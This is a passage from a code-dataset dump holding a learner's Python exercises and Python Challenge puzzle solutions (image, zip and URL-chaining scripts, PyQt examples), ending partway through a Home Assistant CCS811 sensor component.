"text": "__author__ = 'cxa70'\nimport re\n\nclass Section:\n def __init__(self):\n self.Sections = []\n self.Values = []\n self.Attributes = []\n self.IsRoot = False\n self.Name = \"\"\n self.Value = \"\"\n self.Namespace = \"\"\n\n def has_sections(self):\n return len(self.Sections) > 0\n\n def has_values(self):\n return len(self.Values) > 0\n\n def _build_attribs(self, attribs):\n for attrib in attribs.keys():\n new_attrib = Attribute()\n new_attrib.Name = attrib\n new_attrib.Value = attribs[attrib]\n self.Attributes.append(new_attrib)\n\n def build_from_etree(self, etree):\n regex = re.compile(\"{(.*)}(.*)\")\n r = regex.search(etree.tag)\n if len(r.groups()) > 0:\n self.Name = r.groups()[1]\n self.Namespace = r.groups()[0]\n else:\n self.Name = etree.tag.strip()\n\n self.Value = etree.text.strip()\n if len(etree.attrib) > 0:\n self._build_attribs(etree.attrib)\n\n if len(etree) > 0:\n for ele in etree:\n child = Section()\n child.build_from_etree(ele)\n if child.has_values():\n self.Sections.append(child)\n else:\n self.Values.append(child)\n\n\n\nclass Value:\n def __init__(self):\n self.Name = \"\"\n self.Value = \"\"\n\n\nclass Attribute:\n def __init__(self):\n self.Name = \"\"\n self.Value = \"\""
},
{
"alpha_fraction": 0.5775862336158752,
"alphanum_fraction": 0.5862069129943848,
"avg_line_length": 18.33333396911621,
"blob_id": "f96621cb8fa478c262bcd7770ef7b31c7e39ae17",
"content_id": "5a3d2f0c0f3dc4be11d680cbb7ce9f14d7183eb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 232,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 12,
"path": "/pluralsight/setup.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\nsetup(\n name='pluralsight',\n version='.09',\n packages=[''],\n url='http://me.com',\n license='GPL',\n author='Charles Ansley',\n author_email='[email protected]',\n description='Some test crap.'\n)\n"
},
{
"alpha_fraction": 0.6297322511672974,
"alphanum_fraction": 0.6352723836898804,
"avg_line_length": 20.254901885986328,
"blob_id": "f50c10fb8611c547f354ddc4b0812b034fa8852f",
"content_id": "64e0c6c60050020aa4296302280494c6f928962c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1083,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 51,
"path": "/pluralsight/structure.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom PyQt4 import QtGui\nimport sys\nfrom myDiag import Ui_dSomeWindow\nfrom enum import Enum\n\n\nclass Color(Enum):\n Red = 1\n Green = 2\n Blue = 3\n\n\nclass Main(QtGui.QMainWindow):\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n self.ui = Ui_dSomeWindow()\n self.ui.setupUi(self)\n\n\nclass HelloWorld(QDialog):\n def __init__(self):\n QDialog.__init__(self)\n\n layout = QVBoxLayout()\n\n self.label = QLabel(\"Hello World!\")\n line_edit = QLineEdit()\n button = QPushButton(\"Close\")\n line_edit.setPlaceholderText(\"Enter your text here...\")\n\n layout.addWidget(self.label)\n layout.addWidget(line_edit)\n layout.addWidget(button)\n\n self.setLayout(layout)\n\n button.clicked.connect(self.close)\n line_edit.textChanged.connect(self.change_text_label)\n self.setFocus()\n\n def change_text_label(self, text):\n self.label.setText(text)\n\n\n\napp = QApplication(sys.argv)\ndialog = HelloWorld()\ndialog.show()\napp.exec_()"
},
{
"alpha_fraction": 0.5830945372581482,
"alphanum_fraction": 0.6031518578529358,
"avg_line_length": 23.068965911865234,
"blob_id": "62236d9fa5bb55662ef0919486fe1db86874f65f",
"content_id": "e01c5177028d629f6948a209040a7a8cf83c3904",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 698,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 29,
"path": "/PythonChallenges/16.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# download the image from: http://www.pythonchallenge.com/pc/return/mozart.html : mozart.gif\napp = QCoreApplication([])\nimg = QImage('mozart.gif')\n\nw = img.size().width()\nh = img.size().height()\n\nmagenta = qRgb(255, 0, 255)\nbars = []\nfor y in range(h):\n for x in range(w-5):\n pixel = img.pixel(x, y)\n opixel = img.pixel(x+4, y)\n if pixel == magenta and opixel == magenta:\n bars.append((x, y))\n\nnewImg = QImage(w, h, img.format())\n\nfor y in range(h):\n for x in range(w):\n newImg.setPixel((x + w - bars[y][0]) % w, y, img.pixel(x, y))\n\nnewImg.save(\"newMozart.png\")\nprint('done')\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7719298005104065,
"avg_line_length": 18.33333396911621,
"blob_id": "d53494263300117232853d00aeb0961a615ac354",
"content_id": "b29d1f3868af4631dce79de6b1d7330ce01a3b95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 57,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 3,
"path": "/PythonChallenges/misc.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "import subprocess\n\nsubprocess.call(r'python.exe .\\16.py')"
},
{
"alpha_fraction": 0.6702249050140381,
"alphanum_fraction": 0.6744186282157898,
"avg_line_length": 36.485713958740234,
"blob_id": "c85055239b90ecb74bee729a22bde9d057faa37a",
"content_id": "cb931c3d15dd3f959f2a010db8b6c59be3250128",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2625,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 70,
"path": "/PythonExercises/highorderfunctions.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "# from functools import reduce\n\n# Using the higher order function reduce(), write a function max_in_list() that takes a list of numbers and returns\n# the largest one. Then ask yourself: why define and call a new function, when I can just as well call the reduce()\n# function directly?\ndef max_in_list(number_list):\n return reduce((lambda x, y: x if (x > y) else y), number_list)\n\n\n# Write a program that maps a list of words into a list of integers representing the lengths of the correponding words.\n# Write it in three different ways: 1) using a for-loop, 2) using the higher order function map(), and 3) using list\n# comprehensions.\ndef map_words(word_list):\n list1 = []\n for x in word_list:\n list1.append(len(x))\n\n list2 = [len(x) for x in word_list]\n\n list3 = list(map(lambda x: len(x), word_list))\n\n return [list1, list2, list3]\n\n\n# Write a function find_longest_word() that takes a list of words and returns the length of the longest one.\n# Use only higher order functions.\ndef find_longest_word(word_list):\n return reduce((lambda x, y: x if (x > y) else y), map(lambda x: len(x), word_list))\n\n\n# Using the higher order function filter(), define a function filter_long_words() that takes a list of words and an\n# integer n and returns the list of words that are longer than n.\ndef filter_long_words(word_list, target_len):\n return list(filter(lambda x: len(x) > target_len, word_list))\n\n\n# Represent a small bilingual lexicon as a Python dictionary in the following fashion {\"merry\":\"god\", \"christmas\":\"jul\"\n# , \"and\":\"och\", \"happy\":gott\", \"new\":\"nytt\", \"year\":\"år\"} and use it to translate your Christmas cards from English\n# into Swedish. Use the higher order function map() to write a function translate() that takes a list of English words\n# and returns a list of Swedish words.\ndef translate(word_list):\n swede_dict = {\"merry\": \"god\", \"christmas\": \"jul\", \"and\": \"och\", \"happy\": \"gott\", \"new\": \"nytt\", \"year\": \"år\"}\n return list(map(lambda x: swede_dict[x], word_list))\n\n\n# Implement the higher order functions map(), filter() and reduce().\n# (They are built-in but writing them yourself may be a good exercise.)\ndef map(func, list):\n newlist = []\n for x in list:\n newlist.append(func(x))\n return newlist\n\n\ndef filter(func, list):\n newlist = []\n for x in list:\n if func(x):\n newlist.append(x)\n return newlist\n\n\ndef reduce(func, list):\n returnval = None\n for i in range(len(list) - 1):\n if not returnval:\n returnval = list[i]\n else:\n returnval = func(returnval, list[i])\n return returnval"
},
{
"alpha_fraction": 0.4285714328289032,
"alphanum_fraction": 0.523809552192688,
"avg_line_length": 20,
"blob_id": "55f5232e3e6e4b1d9aa1e97b384108740cf73d94",
"content_id": "2d5315a4a39f9580426c6c0ea882844b13cd5cfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/HeadFirstPython/Ch1/__init__.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n"
},
{
"alpha_fraction": 0.5175315737724304,
"alphanum_fraction": 0.583450198173523,
"avg_line_length": 27.559999465942383,
"blob_id": "4e7c561c022d00a6ebd876a65ab13e48605e828a",
"content_id": "c60bdd6d46884a54e00d8289f29ce867b0e6dc0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 713,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 25,
"path": "/PythonChallenges/14.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\napp = QCoreApplication([])\nimg = QImage(\"wire.png\")\no = QImage(100, 100, img.format())\n\n# spiral wrap pixels into new 100x100 png\n#directional directives, 1, 0 means increment x by 1, and y by 0\ndirs = [(1, 0), (0, 1), (-1, 0), (0, -1)]\nx, y, z = -1, 0, 0\n\nfor i in range(200):\n d = dirs[i % 4] # gets one of the 4 directives in sequential order\n for j in range(100 - (i+1) // 2): # not sure about this syntax...\n x += d[0]\n y += d[1]\n pixel = img.pixel(z, 0)\n o.setPixel(x, y, pixel)\n z += 1\n\no.save(\"14.png\")\n# results in \"cat\" image. using this in url tells us name is uzi....next url is uzi"
},
{
"alpha_fraction": 0.6294357180595398,
"alphanum_fraction": 0.6337987184524536,
"avg_line_length": 41.623966217041016,
"blob_id": "c6c32797c52b87a7966aa122afa0d07a08b0a35b",
"content_id": "e65b05a45a09288aa6a62f2408e26cd88159c4ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10317,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 242,
"path": "/PythonExercises/simpleIO.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "from pprint import pprint as pp\nimport re\nimport os\nimport time\nimport win32com.client\nimport functools\nimport random\nimport getpass\n\n# Write a version of a palindrome recogniser that accepts a file name from the user, reads each line,\n# and prints the line to the screen if it is a palindrome.\ndef print_palindromes(filePath):\n file = open(filePath)\n char_regex = re.compile(\"[a-z]\", re.IGNORECASE)\n for line in file:\n stripped = ''.join(char_regex.findall(line)).lower()\n if stripped == ''.join(reversed(stripped)):\n pp(line)\n\n\n# According to Wikipedia, a semordnilap is a word or phrase that spells a different word or phrase backwards.\n# (\"Semordnilap\" is itself \"palindromes\" spelled backwards.) Write a semordnilap recogniser that accepts a file name\n# (pointing to a list of words) from the user and finds and prints all pairs of words that are semordnilaps to the\n# screen. For example, if \"stressed\" and \"desserts\" is part of the word list, the the output should include the pair\n# \"stressed desserts\". Note, by the way, that each pair by itself forms a palindrome!\ndef find_semordnilaps(filePath):\n file = open(filePath)\n wordlist = []\n finallist = []\n for line in file:\n for word in line.split():\n wordlist.append(word)\n\n for x in wordlist:\n for y in wordlist:\n if x.lower() == ''.join(reversed(y)).lower():\n combined = x + ' ' + y\n inverted = y + ' ' + x\n if combined not in finallist and inverted not in finallist:\n finallist.append(combined)\n return finallist\n\n\n# Write a procedure char_freq_table() that, when run in a terminal, accepts a file name from the user,\n# builds a frequency listing of the characters contained in the file, and prints a sorted and nicely formatted\n# character frequency table to the screen.\ndef char_freq_table(file_path, sort_index):\n f = open(file_path)\n char_dict = {}\n for line in f:\n for c in line:\n if c not in char_dict.keys():\n char_dict[c] = 1\n else:\n char_dict[c] += 1\n\n finallist = []\n for x in char_dict.keys():\n finallist.append((x, char_dict[x]))\n\n return sorted(finallist, key=lambda x: x[sort_index])\n\n\n# The International Civil Aviation Organization (ICAO) alphabet assigns code words to the letters of the English\n# alphabet acrophonically (Alfa for A, Bravo for B, etc.) so that critical combinations of letters (and numbers)\n# can be pronounced and understood by those who transmit and receive voice messages by radio or telephone regardless\n# of their native language, especially when the safety of navigation or persons is essential. Here is a Python\n# dictionary covering one version of the ICAO alphabet:\n#\n# d = {'a':'alfa', 'b':'bravo', 'c':'charlie', 'd':'delta', 'e':'echo', 'f':'foxtrot',\n# 'g':'golf', 'h':'hotel', 'i':'india', 'j':'juliett', 'k':'kilo', 'l':'lima',\n# 'm':'mike', 'n':'november', 'o':'oscar', 'p':'papa', 'q':'quebec', 'r':'romeo',\n# 's':'sierra', 't':'tango', 'u':'uniform', 'v':'victor', 'w':'whiskey',\n# 'x':'x-ray', 'y':'yankee', 'z':'zulu'}\n#\n# Your task in this exercise is to write a procedure speak_ICAO() able to translate any text (i.e. any string) into\n# spoken ICAO words. You need to import at least two libraries: os and time. On a mac, you have access to the system\n# TTS (Text-To-Speech) as follows: os.system('say ' + msg), where msg is the string to be spoken. (Under UNIX/Linux\n# and Windows, something similar might exist.) 
Apart from the text to be spoken, your procedure also needs to accept\n# two additional parameters: a float indicating the length of the pause between each spoken ICAO word, and a float\n# indicating the length of the pause between each word spoken.\ndef speak_ICAO(text_to_speak, char_pause, word_pause):\n word_list = text_to_speak.split()\n d = {'a': 'alfa', 'b': 'bravo', 'c': 'charlie', 'd': 'delta', 'e': 'echo', 'f': 'foxtrot',\n 'g': 'golf', 'h': 'hotel', 'i': 'india', 'j': 'juliett', 'k': 'kilo', 'l': 'lima',\n 'm': 'mike', 'n': 'november', 'o': 'oscar', 'p': 'papa', 'q': 'quebec', 'r': 'romeo',\n 's': 'sierra', 't': 'tango', 'u': 'uniform', 'v': 'victor', 'w': 'whiskey',\n 'x': 'x-ray', 'y': 'yankee', 'z': 'zulu'}\n\n speaker = win32com.client.Dispatch(\"SAPI.SpVoice\")\n for word in word_list:\n for char in word:\n if char in d.keys():\n speaker.Speak(d[char])\n #os.system('say ' + d[char])\n time.sleep(char_pause)\n time.sleep(word_pause)\n\n\n# A hapax legomenon (often abbreviated to hapax) is a word which occurs only once in either the written record of a\n# language, the works of an author, or in a single text. Define a function that given the file name of a text will\n# return all its hapaxes. Make sure your program ignores capitalization.\ndef get_hapaxes(file_path):\n f = open(file_path)\n word_list = {}\n for line in f:\n for word in line.split():\n if word.lower() not in word_list.keys():\n word_list[word.lower()] = 1\n else:\n word_list[word.lower()] += 1\n final_list = []\n for x in word_list.keys():\n if word_list[x] == 1:\n final_list.append(x)\n return final_list\n\n\n# Write a program that given a text file will create a new text file in which all the lines from the original\n# file are numbered from 1 to n (where n is the number of lines in the file).\ndef number_lines(source_file, dest_file):\n ct = 0\n with open(source_file) as s:\n with open(dest_file, 'w+') as d:\n for line in s:\n d.write(str(ct) + '. ' + line)\n ct += 1\n return \"Wrote %s lines.\" % str(ct)\n\n\n# Write a program that will calculate the average word length of a text stored in a file (i.e the sum of all the\n# lengths of the word tokens in the text, divided by the number of word tokens).\ndef get_avg_word_len(file_path):\n lengths = []\n with open(file_path) as f:\n for line in f:\n for word in line.split():\n lengths.append(len(word))\n return functools.reduce(lambda x, y: x + y, lengths) / len(lengths)\n\n\n# Write a program able to play the \"Guess the number\"-game, where the number to be guessed is randomly chosen\n# between 1 and 20. (Source: http://inventwithpython.com) This is how it should work when run in a terminal:\n#\n# >>> import guess_number\n# Hello! What is your name?\n# Torbjörn\n# Well, Torbjörn, I am thinking of a number between 1 and 20.\n# Take a guess.\n# 10\n# Your guess is too low.\n# Take a guess.\n# 15\n# Your guess is too low.\n# Take a guess.\n# 18\n# Good job, Torbjörn! You guessed my number in 3 guesses!\ndef guess_number_game():\n user_name = input(\"Hello! What is your name?\\n\")\n num_to_guess = random.randrange(1, 20)\n guess_count = 0\n guess_value = 0\n pp(\"Well %s, I am thinking of a number between 1 and 20.\" % user_name)\n while guess_value != num_to_guess:\n guess_count += 1\n guess_value = int(input(\"Take a guess.\\n\"))\n if guess_value == num_to_guess:\n pp(\"Good job, %s! 
You guessed my number in %d guesses!\" % (user_name, guess_count))\n return\n elif guess_value < num_to_guess:\n pp(\"Your guess is too low.\")\n elif guess_value > num_to_guess:\n pp(\"Your guess is too high.\")\n\n\n# An anagram is a type of word play, the result of rearranging the letters of a word or phrase to produce a new\n# word or phrase, using all the original letters exactly once; e.g., orchestra = carthorse, A decimal point =\n# I'm a dot in place. Write a Python program that, when started\n# 1) randomly picks a word w from given list of words,\n# 2) randomly permutes w (thus creating an anagram of w),\n# 3) presents the anagram to the user, and\n# 4) enters an interactive loop in which the user is invited to guess the original word.\n# It may be a good idea to work with (say) colour words only. The interaction with the program may look like so:\n#\n# >>> import anagram\n# Colour word anagram: onwbr\n# Guess the colour word!\n# black\n# Guess the colour word!\n# brown\n# Correct!\ndef guess_word_game():\n word_list = ['red', 'green', 'brown', 'black', 'purple']\n target_word = word_list[random.randrange(0, len(word_list))]\n anagram = ''\n idxlist = []\n while len(idxlist) < len(target_word):\n rnd = random.randrange(0, len(target_word))\n if rnd not in idxlist:\n idxlist.append(rnd)\n for x in idxlist:\n anagram += target_word[x]\n pp(\"Color word anagram: %s\" % anagram)\n guess_word = \"\"\n while guess_word != target_word:\n guess_word = input(\"Guess the colour word!\\n\")\n pp(\"Correct!\")\n\n\n# In a game of Lingo, there is a hidden word, five characters long. The object of the game is to find this word by\n# guessing, and in return receive two kinds of clues: 1) the characters that are fully correct, with respect to\n# identity as well as to position, and 2) the characters that are indeed present in the word, but which are placed\n# in the wrong position. Write a program with which one can play Lingo. Use square brackets to mark characters correct\n# in the sense of 1), and ordinary parentheses to mark characters correct in the sense of 2). Assuming, for example,\n# that the program conceals the word \"tiger\", you should be able to interact with it in the following way:\n#\n# >>> import lingo\n# snake\n# Clue: snak(e)\n# fiest\n# Clue: f[i](e)s(t)\n# times\n# Clue: [t][i]m[e]s\n# tiger\n# Clue: [t][i][g][e][r]\ndef lingo():\n input_word = getpass.getpass(prompt=\"Enter word to guess:\\n\")\n guess_word = \"\"\n while input_word != guess_word:\n response = \"\"\n guess_word = input(\"Enter your guess:\\n\")\n if input_word == guess_word:\n pp(\"Good job! The word was indeed %s\" % input_word)\n return\n for x in range(0, len(guess_word)):\n char = guess_word[x]\n if x < len(input_word) and input_word[x] == char:\n char = \"[\" + char + \"]\"\n elif x < len(input_word) and char in input_word:\n char = \"(\" + char + \")\"\n response += char\n pp(\"Clue: %s\" % response)"
},
{
"alpha_fraction": 0.6038338541984558,
"alphanum_fraction": 0.6230031847953796,
"avg_line_length": 27.5,
"blob_id": "22a05f0b9cc9a700e967dbef9e60d6d292a63507",
"content_id": "0abb86fac35ffbe9909dd6b3419e848ca6a66a47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 626,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 22,
"path": "/PythonChallenges/4.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport urllib.request as req\n\nrootUrl = \"http://www.pythonchallenge.com/pc/def/linkedlist.php?nothing=\"\nnothing = \"82682\"\nisEnd = False\nhttp = req.urlopen(rootUrl + nothing).read().decode(\"utf-8\")\n\nwhile not isEnd:\n print(http)\n if http.__contains__('and the next nothing is'):\n nothing = http[http.index('and the next nothing is ')+24:]\n elif http.__contains__('Yes. Divide by two and keep going.'):\n value = int(nothing)\n value /= 2\n nothing = str(value)\n else:\n isEnd = True\n break\n\n http = req.urlopen(rootUrl + nothing).read().decode(\"utf-8\")"
},
{
"alpha_fraction": 0.6191709637641907,
"alphanum_fraction": 0.6347150206565857,
"avg_line_length": 17.428571701049805,
"blob_id": "6d48459affcfebc3d96da8195b2c6216ec74871b",
"content_id": "f2af4e89b02e628b72c2c9ede810f459938a2ca9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 21,
"path": "/PythonChallenges/3.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n# use provided data to find characters?\nimport string\nimport re\n\npattern = \"[a-z]([A-Z]{3}[a-z]{1}[A-Z]{3})[a-z]\"\n\nrawDataFile = open(\"matchPattern.txt\", \"r\")\nrawData = \"\"\nmatches = []\n\nfor line in rawDataFile:\n match = re.findall(pattern, line)\n if match:\n matches += match\n\nfor match in matches:\n rawData += match[3]\n\nprint(matches)\nprint(rawData)"
},
{
"alpha_fraction": 0.6389891505241394,
"alphanum_fraction": 0.6462093591690063,
"avg_line_length": 20.384614944458008,
"blob_id": "0579a8a66a3a8a914691d2bbc18d466eb3bf9e83",
"content_id": "e28b91441aac0162a27d2b74dc5a2c2c3cd57eef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 13,
"path": "/PythonChallenges/2.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n# use provided data to find characters?\nimport string\n\nrawDataFile = open(\"rareChars.txt\", \"r\")\nrawData = \"\"\n\nfor line in rawDataFile:\n for char in line:\n if (string.ascii_lowercase.__contains__(char)):\n rawData += char\n\nprint(rawData)"
},
{
"alpha_fraction": 0.6592977643013,
"alphanum_fraction": 0.6644993424415588,
"avg_line_length": 29.799999237060547,
"blob_id": "ba104835bc20d4f127e8d2b3e9b8d5ca35ca978b",
"content_id": "b1694dc6eb0425de28cfe3da8bcb88372fb14cfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 25,
"path": "/PythonChallenges/1.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport string\n#convert garbled text to real text\n#hint: k --> m\n# o --> q\n# e --> g\n\ngarbledText = \"g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj.\"\ncleanText = \"\"\n\n#having completed the challenge, use this to move to the next page\ngarbledText = \"map\"\n\nfor char in garbledText:\n if string.ascii_lowercase.__contains__(char):\n idx = string.ascii_lowercase.index(char) + 2\n if idx > len(string.ascii_lowercase) - 1:\n idx -= len(string.ascii_lowercase)\n\n cleanText += string.ascii_lowercase[idx]\n else:\n cleanText += char\n\nprint(cleanText)"
},
{
"alpha_fraction": 0.6706036925315857,
"alphanum_fraction": 0.7034120559692383,
"avg_line_length": 35.261905670166016,
"blob_id": "ee3cda1c0f0c9ff3d2e7614982d5d134d4557db6",
"content_id": "9a2ae61086314ea5a832664c9db6e703f37f9ce4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1524,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 42,
"path": "/pluralsight/myDiag.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'myDiag.ui'\n#\n# Created: Mon Sep 8 08:52:09 2014\n# by: PyQt4 UI code generator 4.11.1\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt4 import QtCore, QtGui\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n\nclass Ui_dSomeWindow(object):\n def setupUi(self, dSomeWindow):\n dSomeWindow.setObjectName(_fromUtf8(\"dSomeWindow\"))\n dSomeWindow.resize(281, 252)\n self.pushButton = QtGui.QPushButton(dSomeWindow)\n self.pushButton.setGeometry(QtCore.QRect(90, 210, 93, 28))\n self.pushButton.setObjectName(_fromUtf8(\"pushButton\"))\n self.listView = QtGui.QListView(dSomeWindow)\n self.listView.setGeometry(QtCore.QRect(10, 10, 261, 192))\n self.listView.setObjectName(_fromUtf8(\"listView\"))\n\n self.retranslateUi(dSomeWindow)\n QtCore.QMetaObject.connectSlotsByName(dSomeWindow)\n\n def retranslateUi(self, dSomeWindow):\n dSomeWindow.setWindowTitle(_translate(\"dSomeWindow\", \"This is my Dialog\", None))\n self.pushButton.setText(_translate(\"dSomeWindow\", \"PushButton\", None))\n\n"
},
{
"alpha_fraction": 0.637410044670105,
"alphanum_fraction": 0.6489208340644836,
"avg_line_length": 28,
"blob_id": "2b6fac1f7ed124763d340ad45fa0969293643d96",
"content_id": "1b4f9d4426302f7845ac51a9e0a9d4f2bbd0736e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 24,
"path": "/PythonChallenges/6.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport zipfile\n\nzf = zipfile.ZipFile('channel.zip')\n\ntargetFileName = \"readme.txt\"\nisEnd = False\nmasterComment = \"\"\n\nwhile not isEnd:\n content = zf.read(targetFileName).decode(\"utf-8\")\n masterComment += zf.getinfo(targetFileName).comment.decode('utf-8')\n if content.__contains__(\"start from\"):\n startIdx = content.index(\"start from\") + 11\n endIdx = content.index(\"\\n\", startIdx)\n targetFileName = content[startIdx:endIdx] + \".txt\"\n elif content.__contains__(\"Next nothing is\"):\n startIdx = content.index(\"Next nothing is\") + 16\n targetFileName = content[startIdx:] + \".txt\"\n else:\n isEnd = True\n\nprint(masterComment)"
},
{
"alpha_fraction": 0.521335780620575,
"alphanum_fraction": 0.5621521472930908,
"avg_line_length": 24.714284896850586,
"blob_id": "16234e914f4e0abff0de1ce6ee99cfe586bb2a51",
"content_id": "245789c0ab6bdd900dd7a72c840e9aaba7e9412b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 21,
"path": "/PythonChallenges/12.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# download the image from: http://www.pythonchallenge.com/pc/return/evil1.jpg\napp = QCoreApplication([])\n\nstuff = \"\"\nbytes = b\"\"\nwith open(\"evil2.gfx\", \"rb\") as f:\n\n byte = f.read(1)\n while byte != b\"\":\n bytes += byte\n byte = f.read(1)\n\nfiles = [('jpg', bytes[0::5]), ('png', bytes[1::5]), ('gif', bytes[2::5]), ('png', bytes[3::5]), ('jpg', bytes[4::5])]\n\nfor i in range(5):\n open('evil2-%d.%s' % (i, files[i][0]), 'wb').write(files[i][1])"
}
] | 34 |
josla972/ccs811 | https://github.com/josla972/ccs811 | 82b1be6898b63348f41a67fd01786cf0caf96de6 | 2d7427c0742dec84fab5911220594fc08679ed54 | 076a966520888dae601ece307bc686b0c8f3eb83 | refs/heads/master | 2020-12-14T10:17:10.872867 | 2020-01-29T01:23:58 | 2020-01-29T01:23:58 | 234,708,367 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5357142686843872,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 27,
"blob_id": "e55df827a5e562d175c60a2dc350015d8418c702",
"content_id": "7d58a76aa291c56fc8c7b54564f3d75375a1c654",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/__init__.py",
"repo_name": "josla972/ccs811",
"src_encoding": "UTF-8",
"text": "\"\"\"The ccs811 component.\"\"\"\n"
},
{
"alpha_fraction": 0.6409250497817993,
"alphanum_fraction": 0.6559372544288635,
"avg_line_length": 33.22685241699219,
"blob_id": "4942be47a416554d31fb30cfe5886c5dcb525561",
"content_id": "3caf721a6921b8ae74c1b25cb6bb95f29b279cdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7394,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 216,
"path": "/sensor.py",
"repo_name": "josla972/ccs811",
"src_encoding": "UTF-8",
"text": "\"\"\"Support for CCS811 temperature and humidity sensor.\"\"\"\nfrom datetime import timedelta\nfrom functools import partial\nimport asyncio\nimport logging\nimport sys\nimport os\nimport time\nimport time\nimport busio\n\nimport adafruit_ccs811 # pylint: disable=import-error\n\nimport voluptuous as vol\n\nfrom homeassistant.core import DOMAIN as HA_DOMAIN, callback\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.const import CONF_NAME, CONF_MONITORED_CONDITIONS, EVENT_HOMEASSISTANT_START, STATE_UNKNOWN\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.util import Throttle\nfrom homeassistant.helpers.event import (\n async_track_state_change,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nCONF_I2C_ADDRESS = \"i2c_address\"\nCONF_I2C_SCL = \"i2c_scl\"\nCONF_I2C_SDA = \"i2c_sda\"\n\nDEFAULT_NAME = \"CCS811 Sensor\"\nDEFAULT_I2C_ADDRESS = 0x5A\nDEFAULT_I2C_SCL = 